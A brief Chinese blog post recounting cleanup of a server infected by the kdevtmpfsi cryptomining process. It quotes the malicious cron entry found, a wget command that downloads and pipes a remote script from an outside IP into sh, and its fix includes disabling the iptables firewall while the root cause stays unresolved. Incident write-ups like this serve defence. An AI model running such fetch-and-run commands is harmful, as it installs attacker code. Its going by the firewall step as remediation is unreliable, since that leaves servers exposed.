服务器被挖矿程,处理过程
服务器被挖矿程,处理过程
出现kdevtmpfsi进程
1、top 命令查看所有的进程,发现CPU使用率最高进程 kdevtmpfsi kill 之后自动又被启动
2、crontab -e 查看定时任务发现出现了如下莫名的定时任务,做了删除处理
#* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
3、netstat -anp 命令,查看进程的内外网络使用情况,发现有几个国外的IP访问链接着内网IP,把对应的几个进程kill之后 CUP恢复了正常,kdevtmpfsi 也没有再出现
文章图片
4、找到挖矿源文件删除处理
文章图片
5、访问网站时,还是访问不了,于是关闭防火墙、重启nginx 和 redis, 就正常了
service iptables stop
service nginx restart
service redis restart
【服务器被挖矿程,处理过程】挖矿程序是如何被植入的,根源问题还没解决,如果服务器重启后,kdevtmpfsi 进程任然可能会再次出现,但是重启服务器后发现kdevtmpfsi 并未再次出现。
推荐阅读
- 科学养胃,别被忽悠,其实真的很简单
- 被新冠“病毒”感染的日常生活(八)
- 过年瞎想
- 【读书清单20】写作吧!你值得被看见(2)
- 罗塞塔石碑的意义(古埃及文字的起源,圣书体文字是如何被破解的)
- 探索免费开源服务器tomcat的魅力
- 【Thesewt】蒙昧(续)
- https请求被提早撤回
- 为什么文章被4个专题收录了阅读量却是个位数()
- 陷入父母的心理战,孩子被彻底打败